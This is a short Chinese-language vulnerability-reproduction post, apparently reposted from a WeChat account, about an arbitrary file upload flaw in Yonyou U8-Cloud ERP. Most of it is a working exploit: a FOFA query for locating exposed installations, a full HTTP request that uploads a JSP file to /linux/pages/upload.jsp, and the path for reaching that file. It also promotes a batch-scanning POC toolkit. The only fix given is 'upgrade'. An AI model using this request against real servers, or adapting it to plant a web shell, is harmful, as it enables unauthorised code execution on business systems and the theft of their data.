@[toc]
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. 用友U8-Cloud 简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。
2.漏洞描述
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件上传漏洞。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
用友U8-Cloud
4.fofa查询语句
app="用友-U8-Cloud"
5.漏洞复现
漏洞链接:http://127.0.0.1/linux/pages/upload.jsp
漏洞数据包:
POST /linux/pages/upload.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
filename: 55056.jsp
Content-Length: 30
<% out.println("025986327");%>
拼接上传的文件地址:http://127.0.0.1/linux/55056.jsp
6.POC&EXP
关注公众号 南风漏洞复现文库 并回复 漏洞复现62 即可获得该POC工具下载地址:
本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球:南风网络安全
7.整改意见
升级版本
8.往期回顾
原文始发于微信公众号(南风漏洞复现文库):用友U8-Cloud 存在任意文件上传漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论